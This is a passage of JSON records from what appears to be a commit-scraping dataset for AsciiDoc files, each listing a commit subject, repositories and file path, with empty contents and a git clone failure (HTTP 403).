Camel 2.17.6 release notes to docs\n","repos":"punkhorn\/camel-upstream,alvinkwekel\/camel,Fabryprog\/camel,nicolaferraro\/camel,christophd\/camel,gnodet\/camel,nikhilvibhav\/camel,kevinearls\/camel,pax95\/camel,mcollovati\/camel,onders86\/camel,onders86\/camel,kevinearls\/camel,sverkera\/camel,Fabryprog\/camel,ullgren\/camel,objectiser\/camel,gnodet\/camel,kevinearls\/camel,gnodet\/camel,nikhilvibhav\/camel,zregvart\/camel,nikhilvibhav\/camel,zregvart\/camel,adessaigne\/camel,pmoerenhout\/camel,tdiesler\/camel,CodeSmell\/camel,ullgren\/camel,onders86\/camel,kevinearls\/camel,adessaigne\/camel,cunningt\/camel,sverkera\/camel,nicolaferraro\/camel,adessaigne\/camel,zregvart\/camel,gnodet\/camel,davidkarlsen\/camel,adessaigne\/camel,zregvart\/camel,anoordover\/camel,apache\/camel,gnodet\/camel,DariusX\/camel,CodeSmell\/camel,punkhorn\/camel-upstream,tadayosi\/camel,davidkarlsen\/camel,DariusX\/camel,cunningt\/camel,apache\/camel,tadayosi\/camel,pmoerenhout\/camel,ullgren\/camel,ullgren\/camel,christophd\/camel,sverkera\/camel,anoordover\/camel,tdiesler\/camel,pmoerenhout\/camel,jamesnetherton\/camel,pmoerenhout\/camel,onders86\/camel,anoordover\/camel,nicolaferraro\/camel,sverkera\/camel,Fabryprog\/camel,mcollovati\/camel,tadayosi\/camel,tdiesler\/camel,apache\/camel,CodeSmell\/camel,onders86\/camel,tadayosi\/camel,apache\/camel,cunningt\/camel,punkhorn\/camel-upstream,cunningt\/camel,DariusX\/camel,objectiser\/camel,kevinearls\/camel,adessaigne\/camel,Fabryprog\/camel,tdiesler\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,jamesnetherton\/camel,CodeSmell\/camel,sverkera\/camel,pmoerenhout\/camel,mcollovati\/camel,pmoerenhout\/camel,christophd\/camel,pax95\/camel,objectiser\/camel,objectiser\/camel,kevinearls\/camel,christophd\/camel,sverkera\/camel,adessaigne\/camel,onders86\/camel,anoordover\/camel,christophd\/camel,alvinkwekel\/camel,jamesnetherton\/camel,apache\/camel,nicolaferraro\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,jamesnetherton\/camel,cunningt\/camel,jamesnetherton\/camel,tdiesler\/camel,jamesnetherton\/camel,pax95\/camel,cunningt\/camel,pax95\/camel,anoordover\/camel,anoordover\/camel,DariusX\/camel,tadayosi\/camel,davidkarlsen\/camel,mcollovati\/camel,alvinkwekel\/camel,tdiesler\/camel,tadayosi\/camel,pax95\/camel,pax95\/camel,apache\/camel,christophd\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2176-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2176-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0a4b9a8a5ebc63aa757312305c32f871d52ab520","subject":"y2b create post Marshall Major Headphones Unboxing (White)","message":"y2b create post Marshall Major Headphones Unboxing (White)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-06-Marshall-Major-Headphones-Unboxing-White.adoc","new_file":"_posts\/2012-01-06-Marshall-Major-Headphones-Unboxing-White.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4e53bc0a653a0629adfd89a852c1f50e3a72615","subject":"y2b create post The Pocket Washing Machine - Does It Suck?","message":"y2b create post The Pocket Washing Machine - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-03-The-Pocket-Washing-Machine--Does-It-Suck.adoc","new_file":"_posts\/2016-12-03-The-Pocket-Washing-Machine--Does-It-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f26feb905880fdde5c433456c15e16aace8db910","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca0ef75110ebea4611d9663c1492d5e2bb2eb4c0","subject":"CL note: more useful lib","message":"CL note: more useful lib\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"a14b8186044388faf35da916c648f7bbe5851113","subject":"Adds 2017-02-13-forge-3.5.1.final.asciidoc","message":"Adds 2017-02-13-forge-3.5.1.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2017-02-13-forge-3.5.1.final.asciidoc","new_file":"news\/2017-02-13-forge-3.5.1.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"ce93f572dca47e131fa3f3117423031a102c4352","subject":"Update 2017-03-25-Drop-handkerchief-with-M-E-M-E.adoc","message":"Update 2017-03-25-Drop-handkerchief-with-M-E-M-E.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-25-Drop-handkerchief-with-M-E-M-E.adoc","new_file":"_posts\/2017-03-25-Drop-handkerchief-with-M-E-M-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d7796ad2abefbfab9f74488dbcced43f8782c81","subject":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","message":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ff25d0d730a83bdf13c7dc09237f09aded35593","subject":"y2b create post How To Make Any Laptop Touch Screen!","message":"y2b create post How To Make Any Laptop Touch Screen!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-08-How-To-Make-Any-Laptop-Touch-Screen.adoc","new_file":"_posts\/2016-12-08-How-To-Make-Any-Laptop-Touch-Screen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c35efaa256669ca5c58f2d308a8c6acdc6f758bd","subject":"Update 2017-01-18-Duvidas-Frequentes-de-Iniciante-em-Rails-com-Ubuntu-14.adoc","message":"Update 2017-01-18-Duvidas-Frequentes-de-Iniciante-em-Rails-com-Ubuntu-14.adoc","repos":"emilio2hd\/emilio2hd.github.io,emilio2hd\/emilio2hd.github.io,emilio2hd\/emilio2hd.github.io,emilio2hd\/emilio2hd.github.io","old_file":"_posts\/2017-01-18-Duvidas-Frequentes-de-Iniciante-em-Rails-com-Ubuntu-14.adoc","new_file":"_posts\/2017-01-18-Duvidas-Frequentes-de-Iniciante-em-Rails-com-Ubuntu-14.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/emilio2hd\/emilio2hd.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59454869636b25319ae48d50067d49485543389f","subject":"added github friendly readme","message":"added github friendly readme\n","repos":"neo4j-attic\/yajsw,neo4j-attic\/yajsw","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neo4j-attic\/yajsw.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"232057225ec47e89122c5cc1df34026a4a870628","subject":"Update 2015-04-08-agenda-asciidoctor-devoxxfr-tshirt-a-gagner.adoc","message":"Update 2015-04-08-agenda-asciidoctor-devoxxfr-tshirt-a-gagner.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-04-08-agenda-asciidoctor-devoxxfr-tshirt-a-gagner.adoc","new_file":"_posts\/2015-04-08-agenda-asciidoctor-devoxxfr-tshirt-a-gagner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"146f0e28e4d08542079861831e253ba5b2b25ea8","subject":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","message":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"828c67a2c5d2fa479a9ddf43c5eddae0d04a65c7","subject":"Update 2017-09-11-Gebetsscheisserle-als-Versachlichung.adoc","message":"Update 2017-09-11-Gebetsscheisserle-als-Versachlichung.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-09-11-Gebetsscheisserle-als-Versachlichung.adoc","new_file":"_posts\/2017-09-11-Gebetsscheisserle-als-Versachlichung.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a40f20e41814040b9a0ac62f8c815918a30b307","subject":"y2b create post Mass Effect 3 Collector's Edition Unboxing","message":"y2b create post Mass Effect 3 Collector's Edition Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-03-07-Mass-Effect-3-Collectors-Edition-Unboxing.adoc","new_file":"_posts\/2012-03-07-Mass-Effect-3-Collectors-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e226bb2ec3856e7f02bbc7f15ae59aa734d909f","subject":"Update 2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","message":"Update 2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","new_file":"_posts\/2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0706e361d94c8fb16a185b23d22b1aa83b753737","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"038fcab06837840cc562d37a6161715538bfe403","subject":"y2b create post Giveaway Winner \\u0026 New Giveaways!","message":"y2b create post Giveaway Winner \\u0026 New Giveaways!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-10-Giveaway-Winner-u0026-New-Giveaways.adoc","new_file":"_posts\/2011-12-10-Giveaway-Winner-u0026-New-Giveaways.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b1e26e79f3a076d72350119e0cc63e55ccc9db85","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b97b492b76e03682934924555e02d572afc257b1","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ca24617cec6c10d01f0bd82bd0dd266f59a26ec","subject":"Import release notes for Groovy 2.1","message":"Import release notes for Groovy 2.1\n","repos":"webkaz\/groovy-website,marcoVermeulen\/groovy-website,sdkman\/sdkman-website,m-ullrich\/groovy-website,kevintanhongann\/groovy-website,rahulsom\/sdkman-website,dmesu\/sdkman-website,benignbala\/groovy-website,dmesu\/sdkman-website,groovy\/groovy-website,webkaz\/groovy-website,kevintanhongann\/groovy-website,groovy\/groovy-website,marc0der\/groovy-website,marc0der\/groovy-website,PascalSchumacher\/groovy-website,benignbala\/groovy-website,sdkman\/sdkman-website,marcoVermeulen\/groovy-website,rahulsom\/sdkman-website","old_file":"site\/src\/site\/releasenotes\/groovy-2.1.adoc","new_file":"site\/src\/site\/releasenotes\/groovy-2.1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rahulsom\/sdkman-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bc76219545547c0638aa90cfea0d9962c19154f9","subject":"Update 2019-06-25-The-Perfect-Man.adoc","message":"Update 2019-06-25-The-Perfect-Man.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-06-25-The-Perfect-Man.adoc","new_file":"_posts\/2019-06-25-The-Perfect-Man.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b93631e7863db8929790bec958e3b2b57ca664f","subject":"Update 2016-12-25-NSUCRYPT-2016-RESULT.adoc","message":"Update 2016-12-25-NSUCRYPT-2016-RESULT.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-12-25-NSUCRYPT-2016-RESULT.adoc","new_file":"_posts\/2016-12-25-NSUCRYPT-2016-RESULT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4faab023f4ff1806c4dcd692c998fc1163082da8","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-policy-authentication","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-authentication.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"330073ed17ba0ec9ac46ab656607f5cedc6f7232","subject":"Fix broken link","message":"Fix broken link\n\nCloses gh-4243\n","repos":"shakuzen\/spring-boot,philwebb\/spring-boot-concourse,chrylis\/spring-boot,aahlenst\/spring-boot,bjornlindstrom\/spring-boot,spring-projects\/spring-boot,michael-simons\/spring-boot,mbenson\/spring-boot,ilayaperumalg\/spring-boot,royclarkson\/spring-boot,isopov\/spring-boot,vpavic\/spring-boot,DeezCashews\/spring-boot,kamilszymanski\/spring-boot,wilkinsona\/spring-boot,pvorb\/spring-boot,ilayaperumalg\/spring-boot,aahlenst\/spring-boot,neo4j-contrib\/spring-boot,lexandro\/spring-boot,mdeinum\/spring-boot,lburgazzoli\/spring-boot,hqrt\/jenkins2-course-spring-boot,zhangshuangquan\/spring-root,yhj630520\/spring-boot,zhanhb\/spring-boot,SaravananParthasarathy\/SPSDemo,joshiste\/spring-boot,herau\/spring-boot,i007422\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,donhuvy\/spring-boot,shakuzen\/spring-boot,jvz\/spring-boot,javyzheng\/spring-boot,yhj630520\/spring-boot,yangdd1205\/spring-boot,michael-simons\/spring-boot,neo4j-contrib\/spring-boot,habuma\/spring-boot,zhangshuangquan\/spring-root,cleverjava\/jenkins2-course-spring-boot,yhj630520\/spring-boot,michael-simons\/spring-boot,srikalyan\/spring-boot,akmaharshi\/jenkins,Buzzardo\/spring-boot,qerub\/spring-boot,yangdd1205\/spring-boot,izeye\/spring-boot,lenicliu\/spring-boot,rweisleder\/spring-boot,nebhale\/spring-boot,candrews\/spring-boot,mdeinum\/spring-boot,hqrt\/jenkins2-course-spring-boot,kdvolder\/spring-boot,afroje-reshma\/spring-boot-sample,bclozel\/spring-boot,pvorb\/spring-boot,tiarebalbi\/spring-boot,ilayaperumalg\/spring-boot,spring-projects\/spring-boot,Nowheresly\/spring-boot,philwebb\/spring-boot,srikalyan\/spring-boot,shakuzen\/spring-boot,royclarkson\/spring-boot,thomasdarimont\/spring-boot,sebastiankirsch\/spring-boot,RichardCSantana\/spring-boot,SaravananParthasarathy\/SPSDemo,aahlenst\/spring-boot,mbogoevici\/spring-boot,linead\/spring-boot,javyzheng\/spring-boot,joshiste\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,xiaoleiPENG\/my-project,chrylis\/spring-boot,habuma\/spring-boot,lexandro\/spring-boot,srikalyan\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,tsachev\/spring-boot,rweisleder\/spring-boot,vpavic\/spring-boot,hello2009chen\/spring-boot,habuma\/spring-boot,i007422\/jenkins2-course-spring-boot,hqrt\/jenkins2-course-spring-boot,qerub\/spring-boot,cleverjava\/jenkins2-course-spring-boot,minmay\/spring-boot,neo4j-contrib\/spring-boot,mbenson\/spring-boot,royclarkson\/spring-boot,javyzheng\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,rweisleder\/spring-boot,zhangshuangquan\/spring-root,rajendra-chola\/jenkins2-course-spring-boot,zhangshuangquan\/spring-root,lburgazzoli\/spring-boot,nebhale\/spring-boot,jmnarloch\/spring-boot,candrews\/spring-boot,scottfrederick\/spring-boot,jbovet\/spring-boot,hqrt\/jenkins2-course-spring-boot,rajendra-chola\/jenkins2-course-spring-boot,zhanhb\/spring-boot,bbrouwer\/spring-boot,mbenson\/spring-boot,xiaoleiPENG\/my-project,donhuvy\/spring-boot,brettwooldridge\/spring-boot,sbcoba\/spring-boot,philwebb\/spring-boot,jmnarloch\/spring-boot,candrews\/spring-boot,tsachev\/spring-boot,deki\/spring-boot,philwebb\/spring-boot,kdvolder\/spring-boot,shakuzen\/spring-boot,herau\/spring-boot,tsachev\/spring-boot,shangyi0102\/spring-boot,dfa1\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,jvz\/spring-boot,izeye\/spring-boot,eddumelendez\/spring-boot,linead\/spring-boot,linead\/spring-boot,thomasdarimont\/spring-boot,lenicliu\/spring-boot,royclarkson\/spring-boot,srikalyan\/spring-boot,sebastiankirsch\/spring-boot,philwebb\/spring-boot,drumonii\/spring-boot,hello2009chen\/spring-boot,scottfrederick\/spring-boot,sbcoba\/spring-boot,hqrt\/jenkins2-course-spring-boot,mdeinum\/spring-boot,michael-simons\/spring-boot,jbovet\/spring-boot,donhuvy\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,habuma\/spring-boot,brettwooldridge\/spring-boot,sbuettner\/spring-boot,Nowheresly\/spring-boot,mbogoevici\/spring-boot,aahlenst\/spring-boot,dfa1\/spring-boot,brettwooldridge\/spring-boot,vpavic\/spring-boot,lucassaldanha\/spring-boot,tiarebalbi\/spring-boot,mrumpf\/spring-boot,pvorb\/spring-boot,jxblum\/spring-boot,jayarampradhan\/spring-boot,kamilszymanski\/spring-boot,joansmith\/spring-boot,lburgazzoli\/spring-boot,kdvolder\/spring-boot,vakninr\/spring-boot,wilkinsona\/spring-boot,ollie314\/spring-boot,lburgazzoli\/spring-boot,olivergierke\/spring-boot,scottfrederick\/spring-boot,SaravananParthasarathy\/SPSDemo,DeezCashews\/spring-boot,aahlenst\/spring-boot,mrumpf\/spring-boot,joshthornhill\/spring-boot,NetoDevel\/spring-boot,shangyi0102\/spring-boot,ptahchiev\/spring-boot,ameraljovic\/spring-boot,hello2009chen\/spring-boot,rweisleder\/spring-boot,deki\/spring-boot,eddumelendez\/spring-boot,tsachev\/spring-boot,ptahchiev\/spring-boot,bbrouwer\/spring-boot,vakninr\/spring-boot,mbogoevici\/spring-boot,linead\/spring-boot,joansmith\/spring-boot,scottfrederick\/spring-boot,thomasdarimont\/spring-boot,dreis2211\/spring-boot,ihoneymon\/spring-boot,lucassaldanha\/spring-boot,ameraljovic\/spring-boot,SaravananParthasarathy\/SPSDemo,joshiste\/spring-boot,drumonii\/spring-boot,jxblum\/spring-boot,drumonii\/spring-boot,javyzheng\/spring-boot,DeezCashews\/spring-boot,SaravananParthasarathy\/SPSDemo,felipeg48\/spring-boot,NetoDevel\/spring-boot,ptahchiev\/spring-boot,Nowheresly\/spring-boot,sbcoba\/spring-boot,philwebb\/spring-boot-concourse,i007422\/jenkins2-course-spring-boot,mosoft521\/spring-boot,RichardCSantana\/spring-boot,royclarkson\/spring-boot,bjornlindstrom\/spring-boot,wilkinsona\/spring-boot,neo4j-contrib\/spring-boot,ameraljovic\/spring-boot,joansmith\/spring-boot,shakuzen\/spring-boot,jbovet\/spring-boot,herau\/spring-boot,deki\/spring-boot,eddumelendez\/spring-boot,tiarebalbi\/spring-boot,ihoneymon\/spring-boot,donhuvy\/spring-boot,philwebb\/spring-boot-concourse,jayarampradhan\/spring-boot,kdvolder\/spring-boot,tiarebalbi\/spring-boot,jvz\/spring-boot,habuma\/spring-boot,brettwooldridge\/spring-boot,isopov\/spring-boot,ihoneymon\/spring-boot,ilayaperumalg\/spring-boot,mdeinum\/spring-boot,zhangshuangquan\/spring-root,jxblum\/spring-boot,htynkn\/spring-boot,nebhale\/spring-boot,kamilszymanski\/spring-boot,ameraljovic\/spring-boot,sbuettner\/spring-boot,isopov\/spring-boot,olivergierke\/spring-boot,izeye\/spring-boot,kdvolder\/spring-boot,i007422\/jenkins2-course-spring-boot,neo4j-contrib\/spring-boot,bclozel\/spring-boot,dfa1\/spring-boot,afroje-reshma\/spring-boot-sample,olivergierke\/spring-boot,RichardCSantana\/spring-boot,mbenson\/spring-boot,NetoDevel\/spring-boot,felipeg48\/spring-boot,zhanhb\/spring-boot,ollie314\/spring-boot,minmay\/spring-boot,sbuettner\/spring-boot,bijukunjummen\/spring-boot,dreis2211\/spring-boot,bjornlindstrom\/spring-boot,Buzzardo\/spring-boot,afroje-reshma\/spring-boot-sample,chrylis\/spring-boot,aahlenst\/spring-boot,chrylis\/spring-boot,ilayaperumalg\/spring-boot,michael-simons\/spring-boot,hello2009chen\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,mevasaroj\/jenkins2-course-spring-boot,joansmith\/spring-boot,mdeinum\/spring-boot,spring-projects\/spring-boot,sbuettner\/spring-boot,vpavic\/spring-boot,ihoneymon\/spring-boot,bjornlindstrom\/spring-boot,tsachev\/spring-boot,mosoft521\/spring-boot,lucassaldanha\/spring-boot,felipeg48\/spring-boot,ollie314\/spring-boot,srikalyan\/spring-boot,jvz\/spring-boot,xiaoleiPENG\/my-project,eddumelendez\/spring-boot,htynkn\/spring-boot,brettwooldridge\/spring-boot,htynkn\/spring-boot,bijukunjummen\/spring-boot,wilkinsona\/spring-boot,joansmith\/spring-boot,jmnarloch\/spring-boot,nebhale\/spring-boot,joshthornhill\/spring-boot,spring-projects\/spring-boot,htynkn\/spring-boot,kdvolder\/spring-boot,javyzheng\/spring-boot,donhuvy\/spring-boot,DeezCashews\/spring-boot,sebastiankirsch\/spring-boot,mrumpf\/spring-boot,chrylis\/spring-boot,mrumpf\/spring-boot,tsachev\/spring-boot,lexandro\/spring-boot,mosoft521\/spring-boot,herau\/spring-boot,akmaharshi\/jenkins,joshiste\/spring-boot,lucassaldanha\/spring-boot,sbuettner\/spring-boot,afroje-reshma\/spring-boot-sample,jbovet\/spring-boot,herau\/spring-boot,ollie314\/spring-boot,Buzzardo\/spring-boot,bijukunjummen\/spring-boot,bjornlindstrom\/spring-boot,bclozel\/spring-boot,thomasdarimont\/spring-boot,joshiste\/spring-boot,mbenson\/spring-boot,jxblum\/spring-boot,vakninr\/spring-boot,scottfrederick\/spring-boot,akmaharshi\/jenkins,cleverjava\/jenkins2-course-spring-boot,rweisleder\/spring-boot,sbcoba\/spring-boot,mdeinum\/spring-boot,felipeg48\/spring-boot,donhuvy\/spring-boot,spring-projects\/spring-boot,tiarebalbi\/spring-boot,deki\/spring-boot,wilkinsona\/spring-boot,htynkn\/spring-boot,qerub\/spring-boot,bclozel\/spring-boot,mbogoevici\/spring-boot,philwebb\/spring-boot-concourse,Nowheresly\/spring-boot,chrylis\/spring-boot,tiarebalbi\/spring-boot,bclozel\/spring-boot,dfa1\/spring-boot,drumonii\/spring-boot,cleverjava\/jenkins2-course-spring-boot,joshthornhill\/spring-boot,ameraljovic\/spring-boot,bbrouwer\/spring-boot,mosoft521\/spring-boot,bclozel\/spring-boot,zhanhb\/spring-boot,vakninr\/spring-boot,pvorb\/spring-boot,izeye\/spring-boot,hello2009chen\/spring-boot,akmaharshi\/jenkins,akmaharshi\/jenkins,philwebb\/spring-boot,vakninr\/spring-boot,thomasdarimont\/spring-boot,jxblum\/spring-boot,dfa1\/spring-boot,joshthornhill\/spring-boot,eddumelendez\/spring-boot,yhj630520\/spring-boot,shangyi0102\/spring-boot,sbcoba\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,dreis2211\/spring-boot,drumonii\/spring-boot,lenicliu\/spring-boot,rweisleder\/spring-boot,deki\/spring-boot,yangdd1205\/spring-boot,sebastiankirsch\/spring-boot,bbrouwer\/spring-boot,lenicliu\/spring-boot,NetoDevel\/spring-boot,jxblum\/spring-boot,habuma\/spring-boot,olivergierke\/